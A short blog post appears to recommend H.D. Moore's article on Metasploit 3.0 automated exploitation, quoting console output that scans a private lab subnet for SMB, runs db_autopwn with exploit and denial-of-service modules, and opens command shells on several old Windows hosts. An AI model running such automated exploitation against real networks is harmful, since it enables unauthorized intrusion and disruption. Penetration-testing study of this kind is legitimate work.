Metasploit 3.0 Automated Exploitation
H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn... To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explaination of setting everything up and running the automated exploitation.. There's also console output to show you exactly what you type and what happens.. It's definately worth the read and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.
Peace,
HT
Console Output:
-----
$ ./msfconsole
=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]
msf > db_nmap -p 445 192.168.0.0/24
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT
Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds
Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>